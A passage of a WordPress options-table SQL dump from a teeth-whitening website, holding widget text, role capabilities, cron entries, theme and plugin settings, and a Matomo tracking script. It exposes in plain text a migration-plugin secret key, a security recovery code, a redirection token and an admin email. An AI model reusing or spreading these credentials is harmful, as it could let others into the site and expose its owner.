thumbnail_size_w','150','yes'),(59,'thumbnail_size_h','150','yes'),(60,'thumbnail_crop','1','yes'),(61,'medium_size_w','300','yes'),(62,'medium_size_h','300','yes'),(63,'avatar_default','mystery','yes'),(64,'large_size_w','1024','yes'),(65,'large_size_h','1024','yes'),(66,'image_default_link_type','none','yes'),(67,'image_default_size','','yes'),(68,'image_default_align','','yes'),(69,'close_comments_for_old_posts','1','yes'),(70,'close_comments_days_old','1','yes'),(71,'thread_comments','','yes'),(72,'thread_comments_depth','5','yes'),(73,'page_comments','','yes'),(74,'comments_per_page','50','yes'),(75,'default_comments_page','newest','yes'),(76,'comment_order','asc','yes'),(77,'sticky_posts','a:0:{}','yes'),(78,'widget_categories','a:2:{i:2;a:4:{s:5:\"title\";s:0:\"\";s:5:\"count\";i:0;s:12:\"hierarchical\";i:0;s:8:\"dropdown\";i:0;}s:12:\"_multiwidget\";i:1;}','yes'),(79,'widget_text','a:6:{i:1;a:0:{}i:3;a:4:{s:5:\"title\";s:56:\"Working together with dentists to create brighter smiles\";s:4:\"text\";s:725:\"Recommended services for patients who want to visit a dentist for teeth whitening.\r\n\r\n \r\n\r\n<strong>Hertfordshire</strong>\r\n<a href=\"https://www.theperfectsmile.co.uk/cosmetic-dentistry/smiles-2-suit-u/digital-smile-designing/teeth-whitening\" target=\"_blank\" rel=\"noopener\">The Perfect Smile</a>\r\n\r\n<strong>London</strong>\r\n<a href=\"http://smiledentalplan.co.uk/cosmetic-braces.php\" target=\"_blank\" rel=\"noopener\">SmileMore Dental</a>\r\n\r\n \r\n\r\n<strong>Nationwide</strong>\r\n<a href=\"http://www.perfectpractices.co.uk/\" target=\"_blank\" rel=\"noopener\">The Perfect Practices</a>\r\n\r\n \r\n\r\n<strong>Liverpool</strong>\r\n<a href=\"https://ollieanddarsh.co.uk/\" target=\"_blank\" rel=\"noopener\">Ollie & Darsh</a>\r\n\r\n \";s:6:\"filter\";b:1;s:6:\"visual\";b:1;}i:4;a:4:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:1120:\"<ul>\r\n <li>Teeth Whitening Products was one of the first dedicated teeth whitening specialist centre in London.</li>\r\n <li>It is set in a relaxing environment and staffed by experienced teeth whitening dentists. We provide teeth whitening services in a welcoming and relaxed atmosphere.</li>\r\n <li>Teeth whitening is growing in popularity in UK. All our trained dentists offer the best techniques with the best materials to give you a white, brighter smile.</li>\r\n</ul>\r\n \r\n<h3>Competitive Pricing</h3>\r\n<em>We make our treatments affordable</em>\r\n<ul>\r\n <li>We are also delighted to offer 0% finance to spread the costs of your dental treatment over 6 or 12 month which aims to help with the high value treatment plans.</li>\r\n <li>In the interest of efficiency and clarity please note that payment is expected following each appointment. 6, 12 and 24 months 0% interest-free schemes are available to suit your needs.</li>\r\n <li>For example, affordable teeth whitening from just £20 a month or implants from just £65 a month. <a href=\"https://teethwhiteningproduct.co.uk/prices/\">See prices.</a></li>\r\n</ul>\";s:6:\"filter\";b:1;s:6:\"visual\";b:1;}i:5;a:4:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:404:\"<table class=\"data-table alignright\">\r\n<tbody>\r\n<tr>\r\n<td>Monday</td>\r\n<td>9:00am 8:00pm</td>\r\n</tr>\r\n<tr>\r\n<td>Tuesday</td>\r\n<td>9:00am 6:00pm</td>\r\n</tr>\r\n<tr>\r\n<td>Wednesday</td>\r\n<td>9:00am 8:00pm</td>\r\n</tr>\r\n<tr>\r\n<td>Thursday</td>\r\n<td>9:00am 6:00pm</td>\r\n</tr>\r\n<tr>\r\n<td>Friday</td>\r\n<td>9:00am 8:00pm</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\nPublished by <a href=\"http://hcooke.co.uk/\">Hanson Cooke</a>\";s:6:\"filter\";b:1;s:6:\"visual\";b:1;}i:6;a:4:{s:5:\"title\";s:12:\"We recommend\";s:4:\"text\";s:600:\"<a href=\"http://www.naturalenhancement.co.uk/permanent-makeup-London\"><img class=\"alignnone wp-image-113 size-full\" src=\"https://teethwhiteningproduct.co.uk/wp-content/uploads/2018/02/beauty-6.png\" alt=\"Natural Enhancement London 2018\" width=\"276\" height=\"80\" /></a>\r\n\r\n<strong>Natural Enhancement</strong> - for premium Semi Permanent Makeup treatments in London\r\n<ul>\r\n <li>Eyebrows</li>\r\n <li>Eyeliner</li>\r\n <li>Lips</li>\r\n</ul>\r\n<a href=\"http://www.naturalenhancement.co.uk/eyebrows/is-permanent-makeup-right-for-you\" target=\"_blank\" rel=\"noopener\"><em>Click here for more.</em></a>\r\n\r\n \";s:6:\"filter\";b:1;s:6:\"visual\";b:1;}s:12:\"_multiwidget\";i:1;}','yes'),(80,'widget_rss','a:3:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;i:3;a:6:{s:5:\"title\";s:0:\"\";s:3:\"url\";s:0:\"\";s:5:\"items\";i:10;s:12:\"show_summary\";i:1;s:11:\"show_author\";i:1;s:9:\"show_date\";i:0;}}','yes'),(81,'uninstall_plugins','a:2:{s:27:\"redirection/redirection.php\";a:2:{i:0;s:17:\"Redirection_Admin\";i:1;s:16:\"plugin_uninstall\";}s:23:\"wp-cerber/wp-cerber.php\";s:13:\"cerber_finito\";}','no'),(82,'timezone_string','','yes'),(83,'page_for_posts','0','yes'),(84,'page_on_front','20','yes'),(85,'default_post_format','0','yes'),(86,'link_manager_enabled','0','yes'),(87,'finished_splitting_shared_terms','1','yes'),(88,'site_icon','0','yes'),(89,'medium_large_size_w','768','yes'),(90,'medium_large_size_h','0','yes'),(91,'initial_db_version','38590','yes'),(92,'wp_user_roles','a:5:{s:13:\"administrator\";a:2:{s:4:\"name\";s:13:\"Administrator\";s:12:\"capabilities\";a:64:{s:13:\"switch_themes\";b:1;s:11:\"edit_themes\";b:1;s:16:\"activate_plugins\";b:1;s:12:\"edit_plugins\";b:1;s:10:\"edit_users\";b:1;s:10:\"edit_files\";b:1;s:14:\"manage_options\";b:1;s:17:\"moderate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:6:\"import\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:8:\"level_10\";b:1;s:7:\"level_9\";b:1;s:7:\"level_8\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;s:12:\"delete_users\";b:1;s:12:\"create_users\";b:1;s:17:\"unfiltered_upload\";b:1;s:14:\"edit_dashboard\";b:1;s:14:\"update_plugins\";b:1;s:14:\"delete_plugins\";b:1;s:15:\"install_plugins\";b:1;s:13:\"update_themes\";b:1;s:14:\"install_themes\";b:1;s:11:\"update_core\";b:1;s:10:\"list_users\";b:1;s:12:\"remove_users\";b:1;s:13:\"promote_users\";b:1;s:18:\"edit_theme_options\";b:1;s:13:\"delete_themes\";b:1;s:6:\"export\";b:1;s:23:\"wf2fa_activate_2fa_self\";b:1;s:25:\"wf2fa_activate_2fa_others\";b:1;s:21:\"wf2fa_manage_settings\";b:1;}}s:6:\"editor\";a:2:{s:4:\"name\";s:6:\"Editor\";s:12:\"capabilities\";a:34:{s:17:\"moderate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;}}s:6:\"author\";a:2:{s:4:\"name\";s:6:\"Author\";s:12:\"capabilities\";a:10:{s:12:\"upload_files\";b:1;s:10:\"edit_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:4:\"read\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:12:\"delete_posts\";b:1;s:22:\"delete_published_posts\";b:1;}}s:11:\"contributor\";a:2:{s:4:\"name\";s:11:\"Contributor\";s:12:\"capabilities\";a:5:{s:10:\"edit_posts\";b:1;s:4:\"read\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:12:\"delete_posts\";b:1;}}s:10:\"subscriber\";a:2:{s:4:\"name\";s:10:\"Subscriber\";s:12:\"capabilities\";a:2:{s:4:\"read\";b:1;s:7:\"level_0\";b:1;}}}','yes'),(93,'fresh_site','0','yes'),(94,'widget_search','a:3:{i:2;a:1:{s:5:\"title\";s:0:\"\";}s:12:\"_multiwidget\";i:1;i:4;a:0:{}}','yes'),(95,'widget_recent-posts','a:2:{i:2;a:2:{s:5:\"title\";s:0:\"\";s:6:\"number\";i:5;}s:12:\"_multiwidget\";i:1;}','yes'),(96,'widget_recent-comments','a:2:{i:2;a:2:{s:5:\"title\";s:0:\"\";s:6:\"number\";i:5;}s:12:\"_multiwidget\";i:1;}','yes'),(97,'widget_archives','a:2:{i:2;a:3:{s:5:\"title\";s:0:\"\";s:5:\"count\";i:0;s:8:\"dropdown\";i:0;}s:12:\"_multiwidget\";i:1;}','yes'),(98,'widget_meta','a:2:{i:2;a:1:{s:5:\"title\";s:0:\"\";}s:12:\"_multiwidget\";i:1;}','yes'),(99,'sidebars_widgets','a:5:{s:7:\"sidebar\";a:6:{i:0;s:8:\"search-2\";i:1;s:14:\"recent-posts-2\";i:2;s:17:\"recent-comments-2\";i:3;s:10:\"archives-2\";i:4;s:12:\"categories-2\";i:5;s:6:\"meta-2\";}s:19:\"wp_inactive_widgets\";a:2:{i:0;s:8:\"search-4\";i:1;s:6:\"meta-2\";}s:9:\"sidebar-1\";a:6:{i:0;s:6:\"text-4\";i:1;s:8:\"search-2\";i:2;s:6:\"text-6\";i:3;s:6:\"text-3\";i:4;s:13:\"media_image-3\";i:5;s:14:\"recent-posts-2\";}s:11:\"twitter-wid\";a:4:{i:0;s:5:\"rss-3\";i:1;s:13:\"media_video-3\";i:2;s:6:\"text-5\";i:3;s:10:\"calendar-3\";}s:13:\"array_version\";i:3;}','yes'),(100,'widget_pages','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(101,'widget_calendar','a:2:{s:12:\"_multiwidget\";i:1;i:3;a:0:{}}','yes'),(102,'widget_media_audio','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(103,'widget_media_image','a:2:{s:12:\"_multiwidget\";i:1;i:3;a:15:{s:13:\"attachment_id\";i:74;s:3:\"url\";s:77:\"https://teethwhiteningproduct.co.uk/wp-content/uploads/2018/01/from-55-41.gif\";s:5:\"title\";s:0:\"\";s:4:\"size\";s:4:\"full\";s:5:\"width\";i:227;s:6:\"height\";i:235;s:7:\"caption\";s:0:\"\";s:3:\"alt\";s:0:\"\";s:9:\"link_type\";s:6:\"custom\";s:8:\"link_url\";s:0:\"\";s:13:\"image_classes\";s:0:\"\";s:12:\"link_classes\";s:0:\"\";s:8:\"link_rel\";s:0:\"\";s:17:\"link_target_blank\";b:0;s:11:\"image_title\";s:0:\"\";}}','yes'),(104,'widget_media_gallery','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(105,'widget_media_video','a:2:{s:12:\"_multiwidget\";i:1;i:3;a:0:{}}','yes'),(106,'widget_tag_cloud','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(107,'widget_nav_menu','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(108,'widget_custom_html','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(109,'cron','a:13:{i:1675210152;a:1:{s:24:\"aiowps_hourly_cron_event\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"hourly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:3600;}}}i:1675213316;a:1:{s:34:\"wp_privacy_delete_old_export_files\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"hourly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:3600;}}}i:1675215410;a:1:{s:18:\"wp_https_detection\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}}i:1675250198;a:1:{s:21:\"ai1wm_storage_cleanup\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1675251779;a:3:{s:16:\"wp_version_check\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}s:17:\"wp_update_plugins\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}s:16:\"wp_update_themes\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}}i:1675251837;a:2:{s:19:\"wp_scheduled_delete\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}s:25:\"delete_expired_transients\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1675253352;a:1:{s:23:\"aiowps_daily_cron_event\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1675253670;a:1:{s:22:\"redirection_log_delete\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1675253689;a:1:{s:30:\"wp_scheduled_auto_draft_delete\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1675260901;a:1:{s:24:\"akismet_scheduled_delete\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1675263716;a:1:{s:32:\"recovery_mode_clean_expired_keys\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1675436516;a:1:{s:30:\"wp_site_health_scheduled_check\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"weekly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:604800;}}}s:7:\"version\";i:2;}','yes'),(110,'theme_mods_twentyseventeen','a:2:{s:18:\"custom_css_post_id\";i:-1;s:16:\"sidebars_widgets\";a:2:{s:4:\"time\";i:1516968824;s:4:\"data\";a:4:{s:19:\"wp_inactive_widgets\";a:0:{}s:9:\"sidebar-1\";a:6:{i:0;s:8:\"search-2\";i:1;s:14:\"recent-posts-2\";i:2;s:17:\"recent-comments-2\";i:3;s:10:\"archives-2\";i:4;s:12:\"categories-2\";i:5;s:6:\"meta-2\";}s:9:\"sidebar-2\";a:0:{}s:9:\"sidebar-3\";a:0:{}}}}','yes'),(141,'recently_activated','a:1:{s:23:\"wordfence/wordfence.php\";i:1629757216;}','yes'),(148,'WPLANG','','yes'),(149,'new_admin_email','bensykes@bensykes.co.uk','yes'),(152,'ihaf_insert_header','','yes'),(153,'ihaf_insert_footer','<!-- Matomo -->\r\n<script type=\\\"text/javascript\\\">\r\n var _paq = _paq || [];\r\n /* tracker methods like \\\"setCustomDimension\\\" should be called before \\\"trackPageView\\\" */\r\n _paq.push([\\\"setDocumentTitle\\\", document.domain + \\\"/\\\" + document.title]);\r\n _paq.push([\\\"setCookieDomain\\\", \\\"*.www.teethwhiteningproduct.co.uk\\\"]);\r\n _paq.push([\\\"setDomains\\\", [\\\"*.www.teethwhiteningproduct.co.uk\\\"]]);\r\n _paq.push([\\\'trackPageView\\\']);\r\n _paq.push([\\\'enableLinkTracking\\\']);\r\n (function() {\r\n var u=\\\"//whychurch.org.uk/piwik/\\\";\r\n _paq.push([\\\'setTrackerUrl\\\', u+\\\'piwik.php\\\']);\r\n _paq.push([\\\'setSiteId\\\', \\\'50\\\']);\r\n var d=document, g=d.createElement(\\\'script\\\'), s=d.getElementsByTagName(\\\'script\\\')[0];\r\n g.type=\\\'text/javascript\\\'; g.async=true; g.defer=true; g.src=u+\\\'piwik.js\\\'; s.parentNode.insertBefore(g,s);\r\n })();\r\n</script>\r\n<!-- End Matomo Code -->','yes'),(154,'insert-headers-and-footers_welcome_dismissed_key','1','yes'),(157,'wph_environment_hash','d89e45eb6d1be4009e9faaba4626ed54','yes'),(158,'wph_settings','a:4:{s:15:\"module_settings\";a:0:{}s:13:\"recovery_code\";s:32:\"a76f11f3f754ad0d87652e43140e8664\";s:7:\"version\";s:7:\"1.4.8.2\";s:18:\"write_check_string\";s:16:\"1614078508_36821\";}','yes'),(161,'widget_akismet_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(162,'vc_version','5.1.1','yes'),(163,'wpb_js_composer_license_activation_notified','yes','yes'),(164,'current_theme','Healing Touch','yes'),(165,'theme_mods_wp-barrister','a:4:{i:0;b:0;s:18:\"nav_menu_locations\";a:0:{}s:18:\"custom_css_post_id\";i:-1;s:16:\"sidebars_widgets\";a:2:{s:4:\"time\";i:1517297787;s:4:\"data\";a:4:{s:19:\"wp_inactive_widgets\";a:0:{}s:13:\"sidebar-right\";a:6:{i:0;s:8:\"search-2\";i:1;s:14:\"recent-posts-2\";i:2;s:17:\"recent-comments-2\";i:3;s:10:\"archives-2\";i:4;s:12:\"categories-2\";i:5;s:6:\"meta-2\";}s:12:\"sidebar-page\";a:0:{}s:11:\"sidebar-alt\";a:0:{}}}}','yes'),(166,'theme_switched','','yes'),(170,'redirection_version','2.4','yes'),(171,'redirection_options','a:13:{s:7:\"support\";b:0;s:5:\"token\";s:32:\"5f10ba1db78dde4d5f2f4465e2031a38\";s:12:\"monitor_post\";i:0;s:13:\"monitor_types\";a:0:{}s:19:\"associated_redirect\";s:0:\"\";s:11:\"auto_target\";s:0:\"\";s:15:\"expire_redirect\";i:7;s:10:\"expire_404\";i:7;s:7:\"modules\";a:0:{}s:10:\"newsletter\";b:0;s:14:\"redirect_cache\";i:1;s:10:\"ip_logging\";i:1;s:13:\"last_group_id\";i:1;}','yes'),(355,'theme_mods_vision-lite','a:4:{i:0;b:0;s:18:\"nav_menu_locations\";a:0:{}s:18:\"custom_css_post_id\";i:-1;s:16:\"sidebars_widgets\";a:2:{s:4:\"time\";i:1517297832;s:4:\"data\";a:3:{s:19:\"wp_inactive_widgets\";a:0:{}s:9:\"sidebar-1\";a:6:{i:0;s:8:\"search-2\";i:1;s:14:\"recent-posts-2\";i:2;s:17:\"recent-comments-2\";i:3;s:10:\"archives-2\";i:4;s:12:\"categories-2\";i:5;s:6:\"meta-2\";}s:9:\"sidebar-2\";a:0:{}}}}','yes'),(364,'theme_mods_doctors','a:4:{i:0;b:0;s:18:\"nav_menu_locations\";a:0:{}s:18:\"custom_css_post_id\";i:-1;s:16:\"sidebars_widgets\";a:2:{s:4:\"time\";i:1517298069;s:4:\"data\";a:6:{s:19:\"wp_inactive_widgets\";a:0:{}s:7:\"sidebar\";a:6:{i:0;s:8:\"search-2\";i:1;s:14:\"recent-posts-2\";i:2;s:17:\"recent-comments-2\";i:3;s:10:\"archives-2\";i:4;s:12:\"categories-2\";i:5;s:6:\"meta-2\";}s:15:\"footer_widget_1\";a:0:{}s:15:\"footer_widget_2\";a:0:{}s:15:\"footer_widget_3\";a:0:{}s:15:\"footer_widget_4\";a:0:{}}}}','yes'),(367,'theme_mods_healing-touch','a:24:{s:18:\"custom_css_post_id\";i:-1;s:12:\"slide_title1\";s:12:\"For Dentists\";s:11:\"slide_desc1\";s:42:\"Teeth whitening products for dentists ONLY\";s:11:\"slide_link1\";s:45:\"https://teethwhiteningproduct.co.uk/dentists/\";s:12:\"slide_title2\";s:14:\"Visit Our Shop\";s:11:\"slide_desc2\";s:49:\"Buy whitening products safely and securely online\";s:11:\"slide_link2\";s:41:\"https://teethwhiteningproduct.co.uk/shop/\";s:12:\"slide_title3\";s:27:\"Teeth whitening information\";s:11:\"slide_desc3\";s:75:\"All you need to know about teeth whitening written bu professional dentists\";s:11:\"slide_link3\";s:52:\"https://teethwhiteningproduct.co.uk/teeth-whitening/\";s:13:\"page-setting1\";i:15;s:13:\"page-setting2\";i:13;s:13:\"page-setting3\";i:7;s:13:\"page-setting4\";i:5;s:7:\"fb_link\";s:1:\"/\";s:10:\"twitt_link\";s:1:\"/\";s:10:\"gplus_link\";s:1:\"/\";s:11:\"linked_link\";s:1:\"/\";s:13:\"contact_title\";s:23:\"Teeth whitening studios\";s:12:\"contact_desc\";s:41:\"1-7 Harley St, Marylebone, London W1G 9QD\";s:11:\"contact_fax\";s:0:\"\";s:10:\"contact_no\";s:13:\"020 7112 1112\";s:12:\"contact_mail\";s:33:\"sales@teethwhiteningproduct.co.uk\";s:18:\"nav_menu_locations\";a:1:{s:7:\"primary\";i:2;}}','yes'),(372,'theme_switch_menu_locations','a:0:{}','yes'),(373,'theme_switched_via_customizer','','yes'),(374,'customize_stashed_theme_mods','a:0:{}','no'),(406,'nav_menu_options','a:2:{i:0;b:0;s:8:\"auto_add\";a:1:{i:0;i:2;}}','yes'),(812,'auto_core_update_notified','a:4:{s:4:\"type\";s:7:\"success\";s:5:\"email\";s:23:\"bensykes@bensykes.co.uk\";s:7:\"version\";s:5:\"5.8.6\";s:9:\"timestamp\";i:1666047696;}','no'),(16697,'category_children','a:0:{}','yes'),(74079,'wpseo','a:30:{s:8:\"tracking\";b:0;s:22:\"license_server_version\";b:0;s:15:\"ms_defaults_set\";b:0;s:40:\"ignore_search_engines_discouraged_notice\";b:0;s:25:\"ignore_indexation_warning\";b:0;s:29:\"indexation_warning_hide_until\";b:0;s:18:\"indexation_started\";b:0;s:28:\"indexables_indexation_reason\";s:0:\"\";s:31:\"indexables_indexation_completed\";b:0;s:7:\"version\";s:4:\"14.9\";s:16:\"previous_version\";s:0:\"\";s:20:\"disableadvanced_meta\";b:1;s:30:\"enable_headless_rest_endpoints\";b:1;s:17:\"ryte_indexability\";b:1;s:11:\"baiduverify\";s:0:\"\";s:12:\"googleverify\";s:0:\"\";s:8:\"msverify\";s:0:\"\";s:12:\"yandexverify\";s:0:\"\";s:9:\"site_type\";s:0:\"\";s:20:\"has_multiple_authors\";s:0:\"\";s:16:\"environment_type\";s:0:\"\";s:23:\"content_analysis_active\";b:1;s:23:\"keyword_analysis_active\";b:1;s:21:\"enable_admin_bar_menu\";b:1;s:26:\"enable_cornerstone_content\";b:1;s:18:\"enable_xml_sitemap\";b:1;s:24:\"enable_text_link_counter\";b:1;s:22:\"show_onboarding_notice\";b:0;s:18:\"first_activated_on\";b:0;s:13:\"myyoast-oauth\";b:0;}','yes'),(74080,'yoast_migrations_free','a:1:{s:7:\"version\";s:4:\"14.9\";}','yes'),(75890,'active_plugins1','a:8:{i:0;s:51:\"all-in-one-wp-migration/all-in-one-wp-migration.php\";i:1;s:37:\"wp-hide-security-enhancer/wp-hide.php\";i:2;s:19:\"akismet/akismet.php\";i:3;s:9:\"hello.php\";i:4;s:35:\"insert-headers-and-footers/ihaf.php\";i:5;s:27:\"js_composer/js_composer.php\";i:6;s:41:\"post-type-switcher/post-type-switcher.php\";i:7;s:27:\"redirection/redirection.php\";}','yes'),(75891,'ai1wm_secret_key','TUV2Q1HIydOd','yes'),(75892,'ai1wm_backups_labels','a:0:{}','yes'),(75893,'ai1wm_sites_links','a:0:{}','yes'),(75894,'ai1wm_status','a:3:{s:4:\"type\";s:4:\"done\";s:5:\"title\";s:41:\"Your site has been imported successfully!\";s:7:\"message\";s:388:\"» <a class=\"ai1wm-no-underline\" href=\"https://teethwhiteningproduct.co.uk/wp-admin/options-permalink.php#submit\" target=\"_blank\">Save permalinks structure</a>. (opens a new window)<br />» <a class=\"ai1wm-no-underline\" href=\"https://wordpress.org/support/view/plugin-reviews/all-in-one-wp-migration?rate=5#postform\" target=\"_blank\">Optionally, review the plugin</a>. (opens a new window)\";}','yes'),(75896,'template','healing-touch','yes'),(75897,'stylesheet','healing-touch','yes'),(75898,'swift_performance_plugin_organizer','a:0:{}','yes'),(75899,'jetpack_active_modules','a:0:{}','yes'),(75900,'recovery_keys','a:0:{}','yes'),(75933,'ai1wm_updater','a:0:{}','yes'),(75979,'_transient_health-check-site-status-result','{\"good\":13,\"recommended\":5,\"critical\":1}','yes'),(76160,'finished_updating_comment_type','1','yes'),(76258,'wp_page_for_privacy_policy','0','yes'),(76259,'show_comments_cookies_opt_in','1','yes'),(76260,'admin_email_lifespan','1622287429','yes'),(76261,'disallowed_keys','','no'),(76262,'comment_previously_approved','','yes'),(76263,'auto_plugin_theme_update_emails','a:0:{}','no'),(76264,'auto_update_core_dev','enabled','yes'),(76265,'auto_update_core_minor','enabled','yes'),(76266,'auto_update_core_major','unset','yes'),(76267,'db_upgraded','','yes'),(86278,'can_compress_scripts','0','no'),(88955,'wfls_last_role_change','1624360367','no'),(88956,'wordfence_version','7.5.4','yes'),(88957,'wordfence_case','1','yes'),(88958,'wordfence_installed','1','yes'),(88959,'wordfenceActivated','0','yes'),(88960,'active_plugins','a:2:{i:0;s:51:\"all-in-one-wp-security-and-firewall/wp-security.php\";i:1;s:39:\"disable-gutenberg/disable-gutenberg.php\";}','yes'),(88961,'wf_plugin_act_error','','yes'),(89307,'wordfence_syncAttackDataAttempts','0','no'),(89308,'wordfence_syncingAttackData','0','no'),(89309,'wordfence_lastSyncAttackData','1629595479','no'),(89893,'_cerber_db_errors','a:7:{i:0;a:3:{i:0;s:62:\"Table \'teethwhiteningproductcouk.wp_cerber_sets\' doesn\'t exist\";i:1;s:73:\"SELECT * FROM wp_cerber_sets WHERE the_key = \"_nexus_mode\" AND the_id = 0\";i:2;d:1624622942.783558;}i:1;a:3:{i:0;s:62:\"Table \'teethwhiteningproductcouk.wp_cerber_sets\' doesn\'t exist\";i:1;s:74:\"SELECT * FROM wp_cerber_sets WHERE the_key = \"admin_notice\" AND the_id = 0\";i:2;d:1624622942.789626;}i:2;a:3:{i:0;s:62:\"Table \'teethwhiteningproductcouk.wp_cerber_sets\' doesn\'t exist\";i:1;s:101:\"INSERT INTO wp_cerber_sets (the_key, the_id, the_value, expires) VALUES (\"admin_notice\",0,\"a:0:{}\",0)\";i:2;d:1624622942.789741;}i:3;a:3:{i:0;s:62:\"Table \'teethwhiteningproductcouk.wp_cerber_sets\' doesn\'t exist\";i:1;s:75:\"SELECT * FROM wp_cerber_sets WHERE the_key = \"admin_message\" AND the_id = 0\";i:2;d:1624622942.789851;}i:4;a:3:{i:0;s:62:\"Table \'teethwhiteningproductcouk.wp_cerber_sets\' doesn\'t exist\";i:1;s:102:\"INSERT INTO wp_cerber_sets (the_key, the_id, the_value, expires) VALUES (\"admin_message\",0,\"a:0:{}\",0)\";i:2;d:1624622942.789955;}i:5;a:3:{i:0;s:62:\"Table \'teethwhiteningproductcouk.wp_cerber_sets\' doesn\'t exist\";i:1;s:79:\"SELECT * FROM wp_cerber_sets WHERE the_key = \"cerber_admin_wide\" AND the_id = 0\";i:2;d:1624622942.790048;}i:6;a:3:{i:0;s:62:\"Table \'teethwhiteningproductcouk.wp_cerber_sets\' doesn\'t exist\";i:1;s:100:\"INSERT INTO wp_cerber_sets (the_key, the_id, the_value, expires) VALUES 